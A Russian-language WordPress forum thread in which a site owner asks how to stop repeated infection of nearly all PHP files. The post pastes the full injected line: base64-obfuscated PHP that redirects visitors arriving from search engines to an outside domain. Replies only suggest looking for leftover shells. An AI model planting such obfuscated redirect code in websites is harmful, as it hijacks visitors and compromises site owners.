• Добрый день,
    заразились 2 сайта на одном хостинге заразой
    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9nMXJoLmd1Lm1hLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));

    Инфицированы практически все php файлы.
    Я их почистил сайт восстановил, пароли поменял, права выставил на файлы 640, .htaccess чистый.

    Через 3 дня опять та же история.
    Как избавиться? Как найти дыру, shell и т.д.? Помогите.

    P.s. Может и плагины какие-то виноваты, отключил удалил, но нового ничего не ставил, до этого сайты больше года работали.

    Dr.Web эту заразу называет php.redirector2 но описания нет.

Просмотр 6 ответов — с 1 по 6 (всего 6)
  • upd
    тема самописная

    ВП-то тут причем?
    Спрашивайте у гугла.

    сайт на ВП, вот и я подумал может есть опыт у кого. Google говорит что у joomlaводов было аналогичное и там зараза скрывалась в файле post.php в папке uploads (или как-то так)..(((

    сайт на ВП

    И что с того? если Вам модифицируют файлы, то причем движок?
    Конечно, могут быть дыры в плагинах и темах (тем более самописных), но кто их может знать кроме разработчиков (и хакеров 😉 )
    Ещё раз советую — в гугле масса инфы по вопросам безопасности.

    Ищите лишние файлы. Где-то остался шелл

    Ищите лишние файлы. Где-то остался шелл

    Далеко не факт.

    Но пожалуй, закончим флуд.

Просмотр 6 ответов — с 1 по 6 (всего 6)
  • Тема «Инфицированы все php файлы» закрыта для новых ответов.